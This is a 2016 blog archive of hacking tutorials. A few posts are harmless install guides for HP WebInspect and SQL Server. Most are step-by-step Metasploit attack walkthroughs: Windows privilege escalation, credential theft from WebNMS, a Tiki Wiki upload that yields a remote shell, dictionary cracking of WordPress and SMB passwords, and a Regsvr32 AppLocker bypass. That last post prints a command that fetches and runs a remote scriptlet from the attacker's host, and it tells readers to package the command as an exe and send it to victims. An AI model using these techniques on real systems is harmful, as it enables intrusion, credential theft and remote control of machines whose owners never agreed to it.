Archives

All posts for the month July, 2016

Webinspect is an automated web application security scanning tool from HP. It helps the security professionals to assess the potential vulnerabilities in the web application. It is basically a dynamic black box testing tool which detects the vulnerabilities by actually performing the attack. Today we will see how to install HP Webinspect in Windows.

We will be installing it on Windows 10. HP Webinspect requires SQL server to be installed on the system. So first install SQL server express on Windows as shown here. After SQL server is installed successfully, download the latest version of HP Webinspect from their website. We will use version 16.10 for this howto. Right click on the downloaded file and run with administrator privileges.

The installation wizard will start with the welcome message as shown below. Click on”Next”.

hpwebinspect1

Accept the license agreement and click on “Next”.

hpwebinspect2

You can change the installation folder if you want although keeping it default will not hurt. Click on “Next”.

hpwebinspect3

If you want to setup Webinspect as a sensor, select the option and click on “Next”.

hpwebinspect4

Click on “Install” to start installation process.

hpwebinspect5

Once the installation is over, it will show you the below window. If you want to start HP webinspect, select the option and click on “Finish”.

hpwebinspect6

The program will launch as shown below.

hpwebinspect7

If you get something like below, you have no SQL server installed on your system. Install SQL server express and launch the program again.

hpwebinspect8

The program will prompt you for activation as shown below. The program also offers 15 days trial. I am registering for the trial.

hpwebinspect9

hpwebinspect10

Once the registration process is over, the program will open as shown below. Update the program. In our next howto, We will see how to perform  web app pentesting with HP Webinspect. Until then, Happy Weekend.

hpwebinspect12

 

 

Good morning friends. Today we will see how to install SQL server express 2012 in Windows 10.  Download the relevant SQL server 2012 express from here.  Right click on the downloaded file and run with administrator privileges. The below window should open. Click on the “New SQL server stand-alone installation” option since we are installing a new version of the database server.

sql2012e1

Accept the license terms and click on “Next”.

 

sql2012e2

Most probably the server will update to service pack 1. Leave it to update and after successful update, click on “Next”.

sql2012e3

Click on “Install”. The installation process will start. As it will download setup files, it will take some time.

sql2012e4

It will prompt you to select the features you want to install. If you are not sure what you want, leave the default selection and click on “Next”.

sql2012e5

The Instance configuration window opens. Leave the default options and click on “Next”.

sql2012e6

Click on “Next”.

sql2012e7

Configure the authentication for the SQL server. If you have no idea, once again leave the default options and click on “Next”.

sql2012e8

If you want to send any errors to Microsoft, select the option and click on “Next”.

sql2012e9

The installation will start as shown below.

sql2012e10

The installation progress will end with the below window. Congrats, You have successfully installed SQL server express 2012 in Windows 10.

sql2012e11

 

Good evening friends. Recently we have seen privilege escalation in Windows 7 with bypass uac exploit. Today we will see another exploit ms16-016 mrxdav.sys WEBDAV for privilege escalation in Windows 32bit machines. mrxdav.sys is a Windows driver. It is also called as Windows NT WebDav Minirdr and is used on Windows computers to utilize WebDAV servers. This exploit uses the Microsoft Web Distributed Authoring and Versioning (WebDAV) client to send specifically crafted input to a server to escalate privileges.

First hack the system with Metasploit by using one of the methods shown  in Latest hacks. Once you got a meterpreter session, check the privileges by typing command “getuid“.  We don’t have system privileges. Background the session by typing command “background” as shown below.

webdav1

Load the ms16_016_webdav exploit as shown below.

webdav2

We need only one option: session id of the session we just backgrounded. Set the session id as shown below. Run the exploit. The exploit ran successfully.

webdav3

Now verify the privileges by typing “getuid” command once again as shown below.  We successfully got system privileges.

webdav4

 

Hello friends. Today we will see two exploits: credential disclosure and arbitrary text file download in WebNMS Framework server 5.2. To those newbies who don’t know what WebNMS Framework Server is, it is an industry-leading framework for building network management applications and has over 25,000 deployments worldwide.Its latest version consists two vulnerabilities : credential disclosure and arbitrary text file download.

First let us see the credential disclosure exploit. Start Metasploit and load the exploit as shown below. Type command “show options” to check its options. This server runs on port 9090.

webnms1

Set the target and run the exploit. It will download the credentials and store it in a file as shown below.

webnms2

The next vulnerability is arbitrary text file download. Load the exploit and see its options. It is automatically set to download shadow file in Linux.

webnms3

Before running the exploit type command “info” to see the information about this exploit. As you can see below, it can only download text files and if it is a Windows instance the file should be in the same directory of WebNMS.

webnms4

Since we are running WebNMS framework server on a Windows machine, I have created a text file called secret.txt in the same directory. Let us try the exploit now. Set the target address, file path as shown below and run the exploit. We can see that the file has benn successfully downloaded and saved in a directory.

webnms5

Hello aspiring hackers. Today we will see an exploit in Tiki Wiki CMS Groupware version <=15.1. Tiki Wiki CMS Groupware or simply Tiki, originally known as TikiWiki, is a free and open source Wiki-based content management system and online office suite.  It contains a number of collaboration features allowing it to operate as a Groupware. Groupware is an application software designed to help people involved in a common task to achieve their goals.

This exploit takes advantage of a file upload vulnerability in one of the 3rd party components, ELFinder 2.0. This component comes with default example page which demonstrates file operations such as upload, remove, rename, create directory etc. Default configuration does not force validations such as file extension, content-type etc. Thus, unauthenticated user can upload a PHP file.

Start Metasploit and load the exploit as shown below. Type command “show options” to see the options required to run this exploit.

tiki1

Set the target as shown below and check if it is vulnerable using “check“command.

tiki2

Type command “show payloads” to see the payloads we can set to this exploit. Set the payload as I have set below.

tiki3

Check the options once again after setting the payload. They should look like below.

tiki4

Let’s run this exploit by typing command “run”. We can see that we successfully got the meterpreter shell on the target as shown below.

tiki5

Hello friends. A while ago, we saw Poison Ivy buffer overflow exploit. This exploit is just like the Poison Ivy exploit but this time we target Darkcomet RAT. ( We will learn more about Darkcomet and RAT’s later ). In this case we can just download a file from the system running Darkcomet server.

Start Metasploit and load the exploit as shown below. Type command “show options” to see the options we need.  Look at the options. Although you are familiar with the usual options, there are some new options like NEWVERSION, STORE_LOOT and TARGETFILE.

-NEWVERSION : This exploit works on all darkcomet versions from 3.2 to above. If the version we are targeting is                                       above 5.1, we need to set this option to “true”.

-STORE_LOOT : If you set this option to true, the file we download will be stored in loot. If the option is false, the                                       contents of the file will be outputted to console.

-TARGETFILE : the file to be downloaded from the remote system.

dcometfd1

Set the options as required. I have set store_loot option to false. If you don’t set any targetfile, by default it will download the config file of Darkcomet.

dcometfd2

Let’s see by running the exploit. We can see the contents of Darkcomet configuration file as shown below.

dcometfd3 dcometfd4

Now let’s try to download another file. For this, we need the RC4 key of Darkcomet and the password you got in the config file is useless. But there is high probability that a password has not been set. Then we can just set the DC prefix as key and run the exploit as shown below.

Here I am trying to download the hosts file but encounter an error. It’s probably Windows UAC protecting us.

dcometfd5

Now let’s create a text file in the admin folder called hello.txt with content as “hello hacker”. Now set this as target file and run the exploit. We can see that the text of the file is successfully displayed as shown below.

dcometfd6

Good morning friends. Not all vulnerabilities are unauthenticated, sometimes we require credentials to exploit a vulnerability like the WordPress ajax loadmore Php upload exploit we saw in one of  previous howtos. But how do we get these credentials. Metasploit has an auxiliary module for WordPress user enumeration. Let’s see how this exploit works.

Start Metasploit and load the wordpress user enumeration exploit as shown below. Type command “show options” to see the options we can specify. We can see a variety of options. All the options are self explanatory but let us see some of the options.

The “BLANK_PASSWORDS” option if set will check if any of the users are without any password. The “VERBOSE”option will display more clearly what the module is doing. The “USERNAME” and “PASSWORD” option will check for single username and password respectively. The “USER_AS_PASS” option will check whether the username itself is being used as password. The USER_FILE and PASS_FILE are used to specify file for usernames and passwords to enumerate respectively. The VALIDATE_USERS option will first validate if user exists on the target even before trying to crack his password.

wpuserenum1 wpuserenum2

The “USER_PASS” file option allows us to specify the same file for username and password as shown below. Here I have specified a wordlist consisting of most common passwords as the USER_PASS file. When we execute the module, we can see that it will first validate all the usernames.

wpuserenum3 wpuserenum4

What if we know the username? The first question is how will we know the username. Just go through one of our previous howto : WordPress vulnerability assessment  with WPSCAN. The tool gave use a hint that username is “root”. Now we will set the username as root, specify a common password dictionary as password file as shown below.

wpuserenum5

When I run the script, it confirms that the username is valid and tries all words in the dictionary as password one by one.

wpuserenum6

After some time we can see that we successfully cracked the password for user “root” as “123456”.

wpuserenum7

HOW TO STAY SAFE:

Never use not only common passwords but also common usernames for your websites. Still most of the people tend to use common usernames like admin, administrator etc. and common passwords.

 

 

WordPress is one of the most popular CMS available for websites. It can be used to create a beautiful website, blog, or app. As its developers say, “WordPress is both free and priceless at the same time”. Its latest release to time, 4.5 has been downloaded 40,446,377 times till editing of this howto. But being popular in field of hacking has its own disadvantages. The latest version suffers from oEmbed Denial of Service (DoS), Password Change via Stolen Cookie and Redirect Bypass vulnerabilities.

Similarly every version of WordPress has some vulnerability or other. But how do we find out which version of WordPress is the site running. Metasploit has an auxiliary module for WordPress version detection. Let’s see how it works.

Start Metasploit and load the module. Type command “show options” to see the options we required for this module.

wpversion1

Multiple IP addresses can be set as shown below. I am trying five targets.

wpversion2

After assigning IP addresses, type command “run” to execute the exploit. The first target is my own. As you can see, our two of our targets responded with their version. But what about others? Maybe a firewall is blocking our request or maybe our targeturi is wrong. Please try this scan with targeturi set to “/” and also “/wordpress” for better results.

wpversion3

By the way, version 4.1 suffers from a arbitrary file upload vulnerability.

NOTE: This howto is part of a series “Metasploitable tutorials”.

Good morning friends. In the previous part of the tutorial, we performed a vulnerability scan on our target Metasploitable and got some high ranking vulnerabilities. Before we take the plunge and exploit those vulnerabilities, let’s do some enumeration first.

Enumeration is the process of collecting information about user names, network resources, other machine names,  shares and services running on the network. Although little bit boring, it can be very helpful for the success of the hack in real time. In our previous parts, we have performed scanning and banner grabbing. So we already know what services are running on the target machine. They include FTP,telnet, SMTP and SMB etc. We can perform enumeration on all these services.

SMB stands for Server Message Block. Its mainly used for providing shared access to files, printers and miscellaneous communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. It is a predecessor of  Common Internet File system (CIFS). To know more about SMB please go here.

SMB enumeration can provide a treasure trove of information about our target. So for today’s tutorial let’s see how to perform SMB enumeration with Kali Linux. I will use three tools inbuilt in Kali Linux : enum4linux, acccheck and SMBMap.

The first tool we will use is enum4linux. As the name suggests, it is a tool used for enumeration of Linux. To see all the options of this tool, just type “enum4linux -h“. Using this tool, first let us see the users of the SMB service. Open terminal and type command “enum4linux -U 192.168.25.129” as shown below.

enum4linux1

As we can see above, this system is part of a workgroup. Know the difference between domain and workgroup. We can see below that it has listed all the SMB users present on the target.

enum4linux2

Of all the usernames the tool got us, I am assuming only three usernames are useful to us: user,root and msfadmin since others seem more like processes but we will keep our fingers crossed.

enum4linux3

Before we check for validity of these credentials, let us perform a full enumeration with enum4linux. In the terminal type command “enum4linux 192.178.25.129” i.e without any options.  As you can see below, it lists us Nbtstat information of what services are active on the target.

enum4linux5

It also provides us with the OS information.

enum4linux6

And crucial info about Shares, i.e which user has what rights on the target.

enum4linux7

enum4linux8

It provides us password policy info, in case we don’t get the credentials and want to crack them.

enum4linux9

Groups present on the system.

enum4linux10

It will also display users based on RID cycling.

enum4linux11

It seems there are no printers connected to the target.

enum4linux12

Ok, now we know the users. Let’s try to find out the passwords for the usernames we seem to have got. We will use a tool called acccheck for this purpose. It is a password dictionary attack tool that targets windows authentication via the SMB protocol.  We will see more about password cracking later. First I will try it with the user “user”. In Kali Linux, most of the password dictionaries are present in “usr/share/dirb” directory. So I specify a dictionary which consists of most common passwords used.

Here, I am just guessing that the user may be using a common password. After specifying all the options, Hit Enter. The cracking process starts as shown below.

acccheck1

Once the tool gets the correct password, it stops the scan and displays a success message as shown below. Voila … the password of the user “user” is “user” only.

acccheck2

Seeing this result, I get a new idea. There might be a possibility that all the users may be using their username as password. To find out this, I create a new file called user.txt with all the usernames we got with enum4linux and specify the file for both username and password as shown below.

acccheck4

We got succces with three users; user, msfadmin and a blank user with password “games”. Since we successfully got some credentials, it’s time to see the share drives on our target system. For this, we will use another tool called SMBMap.

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands.

First let us check the rights of each user we got as shown below.

smbmap1

smbmap2

smbmap3

We can see that users user and msfadmin have READ,WRITE permissions on tmp directory only and the Blank user doesn’t have much. Next let us try to list all the drives on the target system with user “msfadmin”. We can see we don’t have enough privileges to execute a command.

smbmap5

Since we have READ privileges, let us read the drive on the target system as shown below. Well that’s all for SMB enumeration guys.

smbmap6

 

RESULT: We got some usernames which may be useful to us while exploiting the system in future.

It is becoming difficult ( although not impossible ) day by day to hack Windows with no vulnerabilities like ms08_067  and of course a lot of security features enabled in Windows. But where there is a will, there is always a way.  Regsvr32 applocker bypass exploit is one such exploit. To understand how this exploit works, you need to know some things like dll and applocker.

AppLocker introduced in Windows 7 and Windows Server 2008 R2 provides administrators to set rules to allow or deny applications from running. These rules could be used for executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx).

Ok, now what is a dll? A dll is a dynamic link library. A dynamic link library contains code and data which can be used by multiple programs at the same time. These libraries usually have  file extensions DLL, OCX (for libraries containing ActiveX controls), or DRV (for legacy system drivers).

Ok now let us see how this exploit works? Start Metasploit and load the exploit as shown below. Check the options we need to set? We can see that the reverse_tcp  meterpreter payload is already set. We will be using  this payload only.

regsvr31

Set all the required options as shown below. SRVhost and lhost are the IP address of our attacker system. After all options are set, type command “run” to run this exploit. It finishes by giving us a command as shown below. We need to run this command on our target system.

regsvr32 /s /n /u /i:http://192.168.25.147:8080/Z1115Nj.sct scrobj.dll

Now let us understand this command discovered by researcher Casey Smith. Regsvr32 is a command line utility to register .dll files as command components in the registry. The ‘s’ option specifies regsvr32 to run silently without displaying any message boxes. The ‘n’ option specifies regsvr32 to not call DllRegisterServer. Since we have specified regsvr32 not to call DLLregisterserver, we should specify another address. We can do this by using “i” option and the IP address where we want ( attacker IP ).

You can see above that our exploit has created a link above for an sct file and a dll.

regsvr32

Now it’s time for our victim to type our command on his system. Copy the command on Notepad and save it as a batch file. Convert this file to exe and send this file to the victim. I have shown one method here.

regsvr33

Now we have to start a listener as shown below.

regsvr34

Set the options exactly as we set for the exploit. So, set the port to 1111. After all the options are set, type “run” to run this exploit. If you get an error like shown below, just change the port and type “run” again. That is just a minor glitch in Metasploit.

After typing “run” the exploit will hang on as shown below.

regsvr35

When our user clicks on our file we sent him, a meterpreter session is opened as shown below.

regsvr36

This may not directly take you to a meterpreter shell and hang on as shown above. Hit on CTRL+C to interrupt the session as shown below.

regsvr37

Next type “sessions -l” to see the available meterpreter sessions. when you get the available sessions type command “sessions -i 2” where “2” is its session id as shown below. Next, well you know what it is.

regsvr38